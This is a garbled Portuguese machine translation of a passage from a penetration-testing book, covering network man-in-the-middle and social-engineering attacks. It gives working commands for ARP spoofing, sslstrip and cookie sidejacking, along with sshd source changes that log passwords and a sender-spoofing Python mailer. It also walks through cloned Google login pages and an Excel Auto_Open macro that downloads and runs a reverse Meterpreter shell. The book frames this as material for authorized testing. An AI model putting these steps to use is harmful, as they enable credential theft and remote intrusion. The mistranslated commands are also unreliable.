Há muitos ataques diferentes que você pode fazer com uma paródia cheia ARP. Vou mostrar­lhe um par mais
neste capítulo, mas vou deixar isso para você descobrir o que é mais apropriado para seu teste.
Ettercap (Kali Linux)
Download: http://ettercap.github.io/ettercap/
Sistema operacional: Linux Kali
Se você é a favor do Linux para fornecer os seus ataques de falsificação ARP, a maneira da velha escola é fazer isso usando
Ettercap . O básico ARP spoof comando é:
ettercap ­TqM arp: remoto / 10.0.1.1 // 10.0.1.7 /
Isto diz para executar uma paródia ARP contra 10.0.1.7 eo gateway 10.0.1.1 usando a interface de texto
(T) em modo silencioso (q) e realizar um MITM (M). Isso significa que todo o tráfego de 10.0.1.7 fluirá
do seu computador para a porta de entrada e você verá todo o tráfego do usuário vítima. Se você queria ver
o tráfego de forma nativa, você pode farejar usando tcpdump ou Wir eshark.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 66/115
Figura 88 ­ Ettercap
Observe que há um monte de diferentes plugins com ettercap e é bem vale o seu tempo para entender
o que eles fazem. Uma vez que você está dentro de uma ettercap ataque MITM, você pode pressionar a letra "P" para ver todas as
diferentes módulos que você pode carregar. Pressionando "P", você deve ver:
Exemplo de plugins disponíveis:
[0] arp_cop 1.1 Relatório de actividade ARP suspeito
[0] Auto­Adicionar 1.2 adiciona automaticamente novas vítimas no intervalo alvo
[0] chk_poison 1.1 Verifique se o envenenamento tido sucesso
[0] dns_spoof 1.1 envia respostas de DNS falsificados
[0] dedo 1,6 Fingerprint um host remoto
[0] finger_submit 1.0 Enviar uma impressão digital para o site do ettercap
[0] remote_browser 1.2 envia URLs visitadas para o navegador
[0] search_promisc 1,2 NICs Pesquisa promisc na LAN
[0] smb_clear 1.0 tenta forçar SMB cleartext auth
[0] smb_down 1.0 tenta forçar SMB para não usar chave auth NTLM2
[0] smurf_attack 1.0 Execute um ataque smurf contra hosts especificados
[0] sslstrip1.1 sslstrip plug­in
[0] stp_mangler 1.0 Torne­se raiz de uma interruptores Spanning Tree
Meu ataque favorito é realizar uma dns_spoof. Isso significa que você controlar onde sua vítima continua
a Internet. Se eles vão para o Gmail, por exemplo, você pode redirecionar a solicitação DNS para apontar para um servidor web
você possui e capturar as credenciais.
Se você quiser ver este ataque em ação contra atualizações de software, visite o meu blog no
https://www.securepla.net/dont­upgrade­your­software/where I discutir como para usar este em combinação
com Evilgrade para tirar proveito dos processos de implementação de atualização pobres.
mal Foca
URL: http://www.informatica64.com/evilfoca/default.aspx
SO: Windows
Chema Alonso desenvolveu uma ferramenta para executar ataques de spoofing ARP contra as redes IPv6, já IPv6
redes usar Network Discovery Protocol (NDP) em vez de ARP. O que um atacante precisa fazer é
modificar o vizinho Modalidade (NS) e vizinho Publicidade (NA) e falsificar os
Request / respostas. Para atacar esses problemas, ele desenvolveu a ferramenta Mal Foca. Para mais informações, você
pode visualizar sua apresentação em: http://www.slideshare.net/chemai64/defcon­21­fear­the­evil­foca­mitm­
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 67/115
ataques utilizando­ipv6.
A ferramenta é capaz de fazer ataques diferentes, tais como:
MITM em redes IPv4 usando ARP Spoofing e injeção DHCP ACK.
MITM em redes IPv6 usando vizinho Publicidade Spoofing, SLAAC Attack, DHCPv6 falso.
DoS (Denial of Service) em redes IPv4 usando ARP Spoofing.
DoS (Denial of Service) em redes IPv6 usando SLAAC Attack.
DNS Hijacking e muito mais.
Figura 89 ­ Evil FOCA IPv6
Figura 90 ­ Evil FOCA SLAAC
Se você com sucesso ARP falsificado a sua vítima, você praticamente controle onde a vítima vai, o que
eles verão o que protocolos eles podem usar, e veja todas as senhas que podem ser passadas de forma clara. Vamos ver
alguns exemplos que se aproveitam desses ataques.
A partir de uma visão de alto nível, sidejacking é o processo de cheirar o tráfego, à procura de tokens de sessão
(cookies), e usando esses tokens para autenticar como o usuário. Lembre­se que o HTTP é um apátrida
protocolo. Isso significa que ele tem que usar outros métodos para controlar sua sessão sem um nome de usuário / senha
autenticação para cada página em uma aplicação web. Depois de se autenticar pela primeira vez, uma sessão
token será gerado para toda a sessão e agora token é, essencialmente, o seu passe de autenticação. E se
que cookie de sessão está comprometido, um atacante pode tomar esses tokens de sessão, importá­los para o seu
próprio navegador e tornar­se­lhe. Se você ainda não estão familiarizados com sidejacking, você pode visitar este link para
Mais em formação:
http://www.pcworld.com/article/209333/how_to_hijack_facebook_using_firesheep.html.
Hamster é um instrumento que permite a estes ataques sidejacking. Ele atua como um servidor proxy que substitui
os cookies com cookies de sessão roubado de outra pessoa, o que lhe permite seqüestrar suas sessões.
Os cookies são cheirou usando o programa Ferret.
Como executar Hamster / Ferret:
Em primeiro lugar, permitir o encaminhamento de IP:
o echo "1"> / proc / sys / net / ipv4 / ip_forward
Em seguida, modificar tabelas IP para SSL Strip:
o iptables ­t nat ­A PREROUTING ­p tcp ­destination­port 80 ­j REDIRECT ­para­port 1000
Em seguida, vamos configurar e executar SSL Strip:
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 68/115
o sslstrip ­f ­a k ­l 1000 w / root / out.txt &
Em seguida, precisamos ativar ARP spoof ­ lembre­se isso vai ARP todos paródia na rede:
o arpspoof ­i eth0 [passagem]
Em seguida, precisamos ativar Ferret. Em uma nova janela de terminal:
o ferret ­i eth0
E finalmente permitir hamster. Em uma nova janela de terminal:
o hamster
Agora você precisa apenas esperar por uma vítima que ir a um website, autenticar ou ser autenticado, e sua
cookies para ser inalado. Uma vez que você sente que obtiveram os seus cookies, olhar para o arquivo hamster.txt que
foi criado. No caso abaixo, vemos que os cookies Reddit da vítima foram roubados e estes são os
tokens de sessão que aparecem na parte direita da imagem abaixo.
Figura 91 ­ Resultados Hamster
Com os tokens de sessão Reddit, vamos ver como podemos usá­los para obter acesso como esse usuário. Posso copiar
as informações valor reddit_session e eu, em seguida, acrescentar que no meu navegador, adicionando um cookie
imitando o cookie que roubou, e depois atualizar a página.
Nós vamos usar o Web Developer Firefox Add­on que instalado durante a configuração para analisar e
adicionar nossos cookies. Podemos cair no Menu cookies e clique Adicionar biscoito . Como você pode ver antes
a adição do biscoito, atualmente eu não estou conectado como qualquer usuário. Adicionando um cookie reddit_session e
adicionando os valores adequados, eu clique em OK.
Figura 92 ­ Substituição de cookies
Atualizar a página, parece que fomos capazes de obter acesso a esta conta (imagem abaixo), sem
nunca saber a senha! Lembre­se que eu estou em nenhuma maneira atacando site ou servidores do Reddit em tudo.
A única coisa que eu estou fazendo é cheirar o tráfego em texto puro, retirando os cookies, e substituindo o meu
bolinhos com os que foram farejou em uma rede que possuo.
Figura 93 ­ tornar­se vítima de Usuário
Firesheep
Não vou falar muito sobre Firesheep, já que é uma ferramenta mais velho e semelhante ao exemplo acima, mas o
conceito ainda existe hoje. Você pode ler um pouco mais sobre ele aqui: http://codebutler.com/firesheep/.
Firesheep é uma ferramenta add­on para o Firefox que cheira as redes com ou sem fios para tokens de sessão
passado em claro. Na janela do seu navegador, ele, em seguida, apresenta uma página enquadrada onde você pode clicar em um usuário
você capturou e tornar­se que o usuário instantaneamente. Você não tem que adicionar qualquer um dos seus próprios cookies
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 69/115
manualmente, mas ele só funciona para um número limitado de sites.
O problema originário é quando cookies de sessão não tem um sinalizador Seguro e protocolo não é
através de HTTPS, então há uma possibilidade de que os cookies serão passadas em claro. Como você verificar se
os cookies são seguras? Eu vou primeiro registrar em meu próprio site e, em seguida, dar uma olhada em meus cookies. eu sou
usando o desenvolvedor web add­on para o Firefox para fazer isso.
Figura 94 ­ informações de cookie e segura de Cookies
Na imagem acima, o token mw_session, que é usado para manter o estado para o usuário, é passado com o
bandeira seguro fora. Se o aplicativo a qualquer momento faz referência a informações sobre essa página através de HTTP ou se um
atacante pode forçar a vítima a visitar www.securepla.net sobre HTTP, o atacante terá a plena
token de sessão e ser capaz de tirar partido do acesso do usuário.
Redirecionamento de DNS:
Se eu tiver um MITM sucesso dentro de uma corporação, um ataque que normalmente acaba por ser frutífero é
clonar a página de intranet (ou qualquer página que requer autenticação), então usá­lo para o redirecionamento de DNS. este
é uma maneira fácil de obter nome de usuário e senhas. Vamos ver um exemplo rápido:
Nós já sabemos como configurar Cain e Abel aos sistemas MITM em uma rede a partir de uma prévia
exemplo. Vamos supor que você já tem uma vítima de roteamento através devocê. O próximo passo é o de modificar e
solicitações de DNS paródia que acontecem através do MITM.
Sob a guia superior Sniffer, guia inferior APR, clique no APR­DNS. Aqui você pode clique direito e adicione DNS
solicitações que você deseja modificar. Como eu disse antes, normalmente eu vou pegar uma página de intranet requerendo
autenticação, mas, neste caso, eu vou falsificar Google e sua autenticação.
Figura 95 ­ Caim e Abel APR­DNS
A segunda coisa que eu preciso fazer é criar uma página falsa para pegar credenciais. Para clonar o site, eu geralmente
usar o kit de ferramentas Engenharia Social (SET). I passar por um exemplo mais detalhado mais tarde no social
Seção de Engenharia, mas uma vez em execução dentro do menu de configurações, ir para 1 ­ ataques de engenharia social, 2 ­
Site Ataque vetores, 3 ­ Credencial Harvester método de ataque, 2 ­ Site Cloner.
Neste caso, eu estou indo para clonar https://accounts.google.com/ ServiceLogin, que é o universal
página de login para o Google, Gmail, G +, e etc. Isso é configurado em uma caixa de Kali que tem um IP
192.168.0.85.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 70/115
Figura 96 ​​­ Clonagem de página de autenticação do Google
Agora que nós configuramos nosso paródia DNS e configurar uma página falsa, quando a vítima ARP Spoofed decide
para ir para google.com, eles serão redirecionados para o nosso SET página clonada. Qualquer nome de usuário e senhas
será impresso para a nossa tela e os usuários serão redirecionados para a página real do Google, para torná­la
como o usuário digitar a senha errada.
Figura 97 ­ Spoofed Google Autenticação de Page e senhas da vítima
sslstrip:
tira SSL é uma ferramenta desenvolvida pela Moxie Marlinspike que redireciona o usuário de uma página HTTPS para uma
site HTTP, de modo que todo o tráfego pode ser inalado em texto claro. Gostaria em primeiro lugar assistir a palestra de Moxie na Blackhat
(Https://www.youtube.com/watch?v=MFol6IMbZ7Y). A ferramenta monitora o tráfego HTTPS e reescreve
toda a comunicação HTTPS para HTTP (texto claro) do usuário.
Comandos de Kali:
echo "1"> / proc / sys / net / ipv4 / ip_forward
iptables ­t nat ­A PREROUTING ­p tcp ­destination­port 80 ­j REDIRECT ­para­port 8080
sslstrip ­l 8080
ettercap ­TqM arp: remoto / 192.168.0.12 // 192.168.0.1 /
Neste caso, estamos spoofing as solicitações de 192.168.0.12 e o gateway de 192.168.0.1.
Figura 98 ­ SSL Faixa
Quando sua vítima (192.168.0.12) vai para facebook.com, ele não irá redirecionar para a versão HTTPS
Facebook para a autenticação. No exemplo abaixo, o usuário vai para o Facebook e os tipos de suas
usuário e senha. Se voltarmos ao ettercap terminal, vamos ver o nome de usuário e senhas
percorrer.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 71/115
Figura 99 ­ Vítima Visitando Facebook.com e redirecionadas para HTTP e capturou senhas
Vamos dizer que você está na rede, mas não pode chegar a sub­redes específicas, pois só é permitido o acesso
por certas máquinas dos usuários ou IPs. Nesses casos, você vai ter para o proxy de um usuário com os IPs próprios ou
Acesso.
Uma das maneiras baratas e fáceis de proxy entre os hosts em redes segmentadas é utilizar um padrão
funções do Windows. Netsh é uma ferramenta de linha de comando para modificar as configurações de rede. Os seguintes
comando irá colocar o host em modo de escuta na porta 8080 e redirecionar todas as solicitações para 192.168.5.33
pela porta 3389. Esta será uma maneira fácil de tráfego RDP procuração em outros hospedeiros.
portproxy netsh interface adicionar v4tov4 listenport = 8080 listenad­vestido = 192.168.0.5 connectport = 3389
conecte = address = 192.168.5.33
Agora você pode tirar um dos anfitriões que você comprometidos e de proxy seus pedidos RDP para que
rede segmentada.
Espero que este capítulo foi capaz de levá­lo à vontade com que se deslocam de na rede para se tornar o
rede. Há um grande número de ataques que pode ajudar tanto o movimento lateral e um privilégio
escalada, mas realmente se resume a compreender o que está no escopo do seu teste e qual é a
maior probabilidade em atendê­lo. Pode levar alguns dos ataques na seção movimento lateral
para chegar a um administrador de domínio, mas manter este capítulo acessível como às vezes você vai correr em um
parede de tijolo e algo neste livro só poderia obtê­lo fora de um atolamento.
Se os ataques do cliente estão no escopo de seus testes, a engenharia social é o seu "ir para" ataque. tem
muitas maneiras diferentes para executar ataques de engenharia social e estes podem variar de ataques de domínio para
spear phishing, ou mesmo cair sticks USB. Desde os ataques de engenharia social, realmente usar o seu próprio
criatividade, eu vou passar por cima de alguns exemplos que eu encontrei para ser frutífera.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 72/115
Eu passei muito tempo de pesquisa procura em domínios doppelgänger e tentando encontrar o mais eficiente
e a maioria de estrondo para os ataques Buck. Você pode encontrar mais em meu trabalho de pesquisa aqui:
http://www.wired.com/threatlevel/2011/09/doppelganger­domains/.
O conceito do meu trabalho de pesquisa foi a força bruta domínios da empresa força para subdomínios válidos que tiveram
MX registros. Para os meus próximos exemplos temos duas empresas factícias diferentes que utilizam os seus
sub­domínios para o email: us.company.com e . uk.company.com que eu tinha feito foi comprado tudo
domínios para uscompany.com, ukcompany. COM e assim por diante. Isso ocorre porque os usuários finais com muita frequência
cometa o erro de esquecer de digitar o período entre o domínio e sub­domínio.
Uma vez eu comprei estes domínios, eu configurar um servidor SMTP, configurado os registros MX e, finalmente, definir
todos os servidores SMTP como catch­all servidores. Isto significa que, se alguém e­mails para o domínio que possuo,
independentemente de quem é enviado para, eu gravar / para a frente todos os e­mails para uma conta de minha escolha.
Isso geralmente é suficiente para provar que você pode capturar com sucesso dados sensíveis e que você vai ver um
monte de e­mails confidenciais da corporação. Se você vai para o artigo acima, você vai ver que tipo de dados
foi reunir e quantas vezes nós fomos capazes de obter SSH / VPN / Acesso Remoto em uma empresa. Nós
também aproveitou a prova de ataque conceito um passo adiante.
No exemplo a seguir, que são orientadas para o site falso bank.com, que tem uma filial na Rússia. o
falso do banco possui ru.bank.com e tem registros MX para que FQDN. Além disso, company.com (outro falso
empresa), possui us.company.com e tem registros MX para o FQDN. Neste falso exemplo,
comprar ambos os domínios doppelgänger uscompany.com e rucompany.com. Se alguém mistypes um
e­mail para qualquer um dos domínios, seremos capazes de injetar­nos no meio da conversa. por um
alguns scripts python simples, quando recebemos um email de john@us.company.com para
bob@rubank.com (mistyped sósia para ru.bank.com), o nosso roteiro vai assumir que e­mail e criar
um novo e­mail para bob@ru.bank.com~~V (o endereço de e­mail adequada) e provenientes da john@uscompany.com
(Doppelganger digitado incorretamente que nós próprios). Isso significa que qualquer resposta resposta a João de Bob virá
de volta através de nós. Agora temos um "Man in a caixa de correio" full configurado e pode apenas passivamente
ouvir ou atacar as vítimas com base no factor de confiança que têm um do outro.Figura 100 ­ Man in the Exemplo MailBox
Durante minha pesquisa, eu também configurado servidores SSH com os domínios doppel­GANGER para ver se as pessoas
mistyped servidores SSH e revelou sua senha de SSH. Há um par de coisas que eu tinha que
configurar antes que pudéssemos ter um ataque bem sucedido.
Em primeiro lugar, eu tenho que definir o registro DNS para apontar todos os registros a um IP particular. Por exemplo, eu definir a A
acolhimento registro para "*" e apontou o registo de anfitrião para o meu endereço IP. Qualquer subdomínio dentro do
sósia irá apontar de volta para o meu servidor. Isto significa que os seguintes domínios serão todos apontam para uma
IP único:
test.uscompany.com
dev.uscomany.com
deadbeef.uscompany.com
Agora, eu preciso configurar um servidor SSH que registra tanto o nome de usuário e senha. Por isso eu tenho
configurado um servidor rodando Ubuntu 11.10. Desde sshd normal não irá gravar as senhas, vou
ter que modificar uma versão do sshd. Comecei fazendo o download openssh 5.9p1 portátil:
wget http://mirror.team­cymru.org/pub/OpenBSD/OpenSSH/portable/openssh­5.9p1.tar.gz
Extrair OpenSSH:
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 73/115
tar xvfz openssh­5.9p1.tar.gz
Vá para o diretório openssh:
o cd openssh­5.9
Eu preciso modificar o arquivo auth­passwd.c antes de eu compilar sshd. Abaixo está o que eu mudei, mas eu tenho
tambémincluído a todo auth­passwd.c Arquivovocês devemos substituir dentrosshd
[https://www.securepla.net/download/auth­passwd.c 2021 ]:
if (! sys_auth_passwd (authctxt, password))
{
FILE * garp;
garp = fopen ( "/ var / log / sshd_logged", "a");
chmod ( "/ var / log / sshd_logged", 0600);
fprintf (garp, "% s:% s:% s \ n", authctxt­> usuário, senha get_remote_ ipaddr ());
fclose (Garp);
}
retorno (resultado && ok);
O que eu fiz aqui é que quando eu tiver um login inválido, eu escrevo o nome de usuário, senha e IP
abordar em um arquivo localizado em / var / log / sshd_logged.
Depois de substituir o arquivo auth­passwd.c, vamos compilar e torná­lo:
sudo ./configure ­prefix = / opt ­sysconfdir = / etc / ssh
faço
sudo make install
Agora eu deveria ter uma versão de trabalho do nosso novo serviço sshd. Para iniciar sshd:
/ Opt / sbin / sshd
Agora você pode apenas executar o comando e você deve ver combinações de senha nome de usuário role por:
tail ­f / var / log / sshd_logged
Saída:
root: Harmon01: 192.168.10.10
admin: AMW & 369 !: 192.168.10.111
tomihama: tomihhama: 192.168.10.24
root: hx7wnk: 192.168.10.19
Agora estamos a gravar com êxito combinações de usuário / senha. Você vai ter que ser extremamente
paciente com este ataque e espero que um desenvolvedor ou usuário de TI mistypes os domínios para SSH. A razão de eu
amo esses ataques é porque estão fora dos ataques do tipo normal e você realmente tem que ser criativo
sobre eles.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 74/115
Devemos estar todos esperamos muito up­to­date on lança ataques de phishing, como você provavelmente encontrar
scams nigerianos o tempo todo. Aqui estão apenas algumas ferramentas e recomendações que tenho para ajudá­lo ainda mais
e com mais confiança executar suas próprias campanhas de spear phishing.
Como eu quero tanto mostrar ferramentas gratuitas e comerciais, Metasploit Pro (ferramenta comercial) tem um bom
módulo com uma interface realmente limpo para conduzir seus ataques de engenharia social. Ele permite que você facilmente
monitorizar e configurar a sua campanha. Lembre­se que esta ferramenta só é ativado se tiver a pagar
versão profissional do Metasploit.
Você pode configurar todos os tipos de engenharia social campanhas, incluindo web, e­mail (com anexos),
e drives USB. O mais comum é o de criar uma página que quer compromete o utilizador final ou um
simples nome de usuário / coletor de senha. A imagem abaixo, eu criei uma página no servidor que clonou um
página do Google Mail e enviá­lo para as minhas vítimas.
Figura 101 ­ Módulo Metasploit Pro Phishing
A segunda parte é criar uma lista de e­mail e para encontrar um modelo de corpo assunto que se adapta às suas vítimas
estilo. Na demo abaixo, eu fiz apenas um e­mail amostra com um clique em mim link.
Figura 102 ­ Metasploit Pro Email Generation
Em um teste de engenharia social, o que é realmente importante para uma organização empresarial é métricas. o
grande parte sobre campanhas Metasploit é que ele faz todo o acompanhamento para você. Ele irá acompanhar se o usuário
abre o e­mail, clica no link, e se eles digitar suas credenciais.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 75/115
Figura 103 ­ Metasploit Phishing Geração de Relatórios
A imagem acima mostra um relatório de exemplo que é auto gerado pelo Metasploit Pro. Eu só fiz uma única
ataque amostra, mas deve dar­lhe uma boa idéia do tipo de relatório que poderia dar­lhe. Diz­lhe
quem fez o quê etapas, o número de vezes que as pessoas clicaram no e­mail e informações sobre navegadores
e uso do sistema operacional.
Uma pergunta que recebo muitas vezes é se as campanhas de engenharia social estão trabalhando. usando este
estrutura e geração de relatórios, você pode criar um monte de estatísticas com base na atividade do usuário. campanhas repetitivo pode
ajudar a provar se a sua organização está ficando melhor ou pior horas extras e de ser capaz de documentar o seu
achados para seu cliente.
A versão gratuita para os seus ataques de engenharia social que eu recomendo é uma ferramenta chamada Social
Toolkit Engenharia (SET). SET é feita por TrustedSec e é uma estrutura orientada python para todos
seus ataques SE. Você pode ler mais sobre os detalhes desta ferramenta e veja vídeos no TrustedSec de
site: https://www.trustedsec.com/downloads/social­engineer­toolkit/.
Eu recomendo SET se você está realmente olhando apenas para comprometer sistemas e provar a um cliente que você
pode possuir sua rede inteira através de um ataque do usuário. Esta não é a melhor ferramenta para realmente obter boas métricas ou para
acompanhar o ciclo de vida do ataque, mas ajuda dramaticamente nos comprometer os usuários e contas. Vamos ver
SET em ação.
Para executar o programa, na linha de comando, digite:
setoolkit
E uma vez que está instalado e funcionando, você deve ver algo como isto:
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 76/115
Figura 104 ­ Engenharia Social Toolkit
credencial Harvester
Uma vez que SET é carregado, há duas abordagens comuns que levam. O primeiro é o harvester credencial.
Este é criar uma página falsa que se parece com uma página de autenticação e obtém um usuário digitar sua
credenciais. Existem muitas abordagens diferentes dentro SET que eu recomendo que você passar o tempo com,
mas eu geralmente estou procurando informações sobre a conta.
Para gerar uma página falsa, vá até o seguinte:
1) (Ataques social­Engenharia)
2) (A página Vetores de Ataque)
3) (Credencial Harvester)
2) (site Cloner)
Escolha IP ou host para recuperar costas POST
Escolha seu site para clonar (Exemplo: https://accounts.google.com/ServiceLogin)
Se a sua vítima vai para o IP ou URL, ele verá algo como o seguinte:
Figura 105 ­ Spoofed autenticação Google e SET Captura senha
Quando seus tipos vítima o seu nome de usuário e senha, ele irá não só dirigi­lo de voltapara o real
página de autenticação do Google, mas volta em sua tela, você deverá ver o nome de usuário e senha o seu
vítima digitado. Além disso, todos os resultados serão salvas em / root / .SET / reports /.
Usando SET JAVA Ataque
O segundo tipo de ataque que eu executar é aquele em que compromete a máquina do usuário. Se você pode obter
uma vítima a visitar um site que você possui, você pode usar uma carga JAVA para baixar e executar um Meterpreter
Concha. Para gerar uma página falsa, vá até o seguinte:
1) (Ataques social­Engenharia)
2) Site Vetores de Ataque
1) Método de Java Applet Ataque
1) Modelos Web
Insira as informações NAT eo anfitrião IP
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 77/115
Escolha o seu modelo
2) O Windows Reverse_TCP Meterpreter
4) backdoored Executable ­> Deixar a porta padrão
Se você configurou tudo corretamente, você deve ver algo como a seguinte imagem:
Figura 106 ­ Sucesso Shell reverso
Agora, se uma vítima vai para a URL que você criou, eles vão ver uma tela de verificação JAVA. Este URL é
normalmente enviado via e­mail ou através de domínios doppelgänger.
Figura 107 ­ SET Java Exploit
A esperança é ter a certeza que enganar a vítima a clicar no botão Run. Uma vez que eles clique em Executar
botão, uma shell Meterpreter será executado. Voltar na caixa de SET, podemos digitar "sessões ­i 1" para saltar
para a nossa Meterpreter escudo em nosso anfitrião vítima. Novamente, é importante tentar ser o sistema, mas se o
"Getsystem" comando não funciona e você é uma conta de administrador local, experimentar o "bypassuac executar"
comando.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 78/115
Figura 108 ­ Sucesso Shell reversa e UAC Bypass
Há duas maneiras de maneiras comuns que enviar e­mails em massa. A maneira rápida e suja é usar python
script usando servidores SMTP do GoDaddy. Neste caso, você tem que ter uma conta com GoDaddy e
comprar seus serviços SMTP, mas eu normalmente vai ter alguns extras livre devido a ataques doppelgänger. o
código python SMTP será algo parecido com o seguinte, que permite que você falsificar o remetente
e­mails para atacar essa relação de confiança que falei e fazer seus ataques de phishing bem sucedido.
#! / Usr / bin / env python
smtplib importação
#Configuração
remetente = 'test@domain_you_own.com' #real informações de conta
spoof_email = 'notaspy@thisdomaindoesntexist.com' informações e­mail #spoof
spoof_name = 'Peter' #who você quer o nome do e­mail para olhar como ele veio
password = '' #password necessário para GoDaddy
receptor = 'victim@gmail.com' #Victim
login = 'test@domain_you_own.com' #GoDaddy Informações para o Login
body = "Estou com fome" #Body da mensagem
message = "From:" + spoof_name + "<" + spoof_email + "" ">
Para: "" "+ receptor +" < "+ receptor +" "">
Assunto: O que você está pensando para o jantar?
"" "Corpo +
experimentar:
session = smtplib.SMTP_SSL ( 'smtpout.secureserver.net', 465)
sessão. EHLO ()
sessão. login (login, senha)
sessão. sendmail (emissor, receptor, mensagem)
sessão. quit ()
exceto smtplib. SmtpException:
print "Erro: não é possível enviar e­mails"
Claro, você vai ter que terminar a código para ler endereços de e­mail a partir de uma lista de e­mail e criar
uma forma criativa para contornar os filtros de spam. A segunda maneira de fazer isso é para continuar e usar SET também
enviar e­mails.
Para e­mail em massa que você terá que executar o Toolkit Engenharia Social e atravesse a seguir:
setoolkit
1) (Ataques social­Engenharia)
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 79/115
5) Massa Ataque Mailer
2) E­Mail Ataque Mass Mailer
Digite o caminho completo para a lista de e­mails
Use o Gmail ou o seu servidor SMTP próprio
Figura 109 ­ SET Emailer Massa
Às vezes você começa em um ambiente onde você não pode usar ataques JAVA ou web baseados. Pode ser
porque você tem que entregar sua carga útil através de um anexo de e­mail ou talvez seja porque você quer
usar meios físicos para o seu ataque (ou seja, sticks USB ou CDs). Uma das melhores taxas de sucesso que eu tive para
esses tipos de ataques é utilizar uma relação de confiança entre o atacante ea vítima e incluir
uma planilha do Excel que tem uma carga útil Meterpreter. Quando eu digo uma relação de confiança, quer dizer encontrar
alguém que a vítima pode comunicar­se regularmente arquivos com e falsificar o seu endereço de e­mail.
Ainda melhor, na seção Lista de compromisso inicial, você poderia ter sido capaz de ganhar alguns
credenciais. Faça o login no Outlook corporativa Web Access (OWA) servidor de correio e começar enviando
funcionários que têm comunicação regular com sua credencial comprometida.
O problema com o uso Metasploit para gerar seus próprios arquivos do Excel é que muitas vezes eles vão
desencadear com anti­vírus. Para atenuar esse, vamos usar as mesmas táticas que fizemos na lateral
Seção movimento e tirar proveito de PowerShell.
Em primeiro lugar, precisamos criar um arquivo do Excel que irá hospedar uma macro maliciosa:
Figura 110 ­ Exemplo Excel com o PowerShell Shell reverso
Após abrir um arquivo do Excel, na guia Exibir, clique no menu suspenso sob Macros, e ir para Ver
Macros. Em seguida, clique em Criar Macro e rotular o nome de macro:
Auto_Open
Você tem que rotulá­la Auto_Open, que informa o aplicativo Excel executar automaticamente a sua macro
durante o lançamento. Em seguida, precisamos adicionar nosso código para executar a carga PowerShell para conectar um
sessão Meterpreter de volta ao nosso ouvinte. Volte para o Post Exploitation com a secção PowerSploit para
atualizar sobre como gerar uma string base64 usar PowerSploit para ligar de volta para seu manipulador.
Sub Auto_Open ()
Sheets ( "Sheet2"). Visible = True
Sheets ( "Plan2"). Select
Dim strCommand As String
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 80/115
strCommand = "PowerShell.exe ­exec Bypass ­NoL ­WIN escondido ­Enc [Base64Code]"
Shell strCommand, 0
End Sub
Este código de macro Excel era de obsuresec. 22 O PowerShell roteiro será parecido com o seguinte para
baixar e executar o shell reverso Meterpreter:
IEX (New­Object Net.WebClient) .DownloadString ( 'https: //raw.github.
com / mattifestation / PowerSploit / master / CodeExecution / Invoke­Shellcode.ps1 '); Invocar­Shellcode ­
janelas de carga útil / meterpreter / reverse_https ­Lhost [Handler IP] ­Lport 443 ­Force
Mais uma vez, tal como nos exemplos anteriores, este código vai ser codificado primeiro usando o script antes ps_encoder.py
incluí­lo na nossa Macro como tínhamos feito na seção de movimento lateral.
Figura 111 ­ Criar macros com PowerShell
A ressalva de que fora como um arquivo XLS (não um arquivo XLSX) como XLSX não vai executar a macro. Antes de enviar
o arquivo Excel, você vai precisar para começar seu ouvinte (StartListener.py). O ouvinte também foi discutido em
o Post Exploitation com a secção PowerSploit e você pode remeter para isso.
Agora, quando você enviar o arquivo Excel no seu vítima, a vítima vai abrir o documento e ser apresentado
com um aviso de segurança, como mostrado abaixo. Você terá de engenheiro social o seu caminho para obter a sua vítima
